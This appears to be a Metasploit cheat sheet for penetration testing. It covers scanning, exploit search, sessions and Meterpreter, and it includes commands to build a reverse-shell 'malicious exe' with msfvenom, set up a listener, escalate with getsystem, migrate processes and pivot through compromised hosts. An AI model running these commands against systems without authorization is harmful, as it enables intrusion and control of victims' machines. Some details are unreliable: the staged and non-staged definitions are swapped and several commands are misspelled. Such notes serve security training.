Metasploit

Set up

Create and initialize MSF database:

sudo msfdb init

Enable database service:

sudo systemctl enable postgresql

Run metasploit:

sudo msfconsole

Verify database connectivity

db_status

Get information about metasploit:

help

Workspaces

Creation

Create new workspace:

workspace -a <name>

Move to workspace:

workspace <name>

Check workspace

workspace

Commands inside workspace

Nmap scan:

db_nmap -A <IP>

Get information about the hosts

hosts

Get information about the services

services

Show specific port

services -p <PORT>

Get more commands:

show -h

Auxiliary Modules

Information Gathering, scanning, enumerating.

List all auxiliary modules:

show auxiliary

Search in auxiliary:

search type:auxiliary <INPUT>

Use auxiliary:

use <ID>

Information about the auxiliary:

info

Show options about the auxiliary:

show options

Run auxiliary:

run

See if metasploit found any vulnerabilities:

vulns

Exploit modules

Search for exploits:

search <SOFTWARE_VERSION>

Show options:

show options

Set payload:

set payload payload/<SYSTEM>/<ARCHITECTURE>/<SHELL_TYPE>

Session and Jobs

Sessions are used to interact and manage access to successfully exploited targets. Jobs are used to run modules for features in the background.

Run attack in the background:

Sessions

Ctrl + Z

List all active attacks:

session -l

Enter the session:

sessions -i <ID>

Delete the session:

session -k <ID>

Jobs

Run job:

run -j 

Payloads

We can recognize staged and non-staged payloads in metasploit by the character "/" (staged) and "_" (non-staged) in payload path.

There are two types of payloads: staged and non-staged.

Staged - payload is sent alongside with exploit (more stable but has more size)

Non-staged - payload is sent in two parts - the first one connect back to us from the machine, the second one transfer larger payload with the rest of the shellcode and executes it.

Show available payloads:

show payloads

Select payload:

set payload <ID>

Meterpreter

After succesfully getting the shell user is able to get all possible commands:

help

Most common commands

Get information about the system:

sysinfo # system info
getuid # current user

Get shell (you can background existing shell with Ctril + Z):

shell

Get shell list:

channel -l

Executable payloads (MSFVenom)

Cheatsheets: https://book.hacktricks.xyz/generic-methodologies-and-resources/shells/msfvenom https://infinitelogins.com/2020/01/25/msfvenom-reverse-shell-payload-cheatsheet/

Search for payloads:

msfvenom -l payloads --platform <OS> --arch <PROCESSOR_ARCHITECTURE>

Create malicious exe file:

msfvenom -p <PAYLOAD_PATH> LHOST=<LOCAL_IP> LPORT=<LOCAL_PORT> -f exe -o <file>.exe

Set up listener with multi/handler:

use multi/handler

Set payload:

set payload <PAYLOAD_PATH>

Meterpreter Post Exploitation

Check idle time:

idletime

Migrate to the other process:

migrate 8052

Escalate:

getsystem

Get uid:

geduid

Pivoting

If you already have a shell type:

ipconfig

In order to pivot through our compromised server we have to set session as background:

bg

Next, we add route in metasploit:

route add <VICTIM_IP_FROM_ANOTHER_SUBNET> <SESSION_ID>

Check the route:

route print

Automatic route add:

multi/manage/autoroute

You can scan another host with:

Remember that LHOST is IP from network card in another subnet.

auxiliary/scanner/portscan/tcp

Socks proxy:

use auxiliary/server/socks_proxy

You can also create port forwarding:

portfwd -h

Metasploit automation

You can also create your own scripts.

You can use multiple different scripts which can be useful while exploiting the machines here:

ls -l /usr/share/metasploit-framework/scripts/resource

Execute the script in the following way:

sudo msfconsole -r <SCRIPT>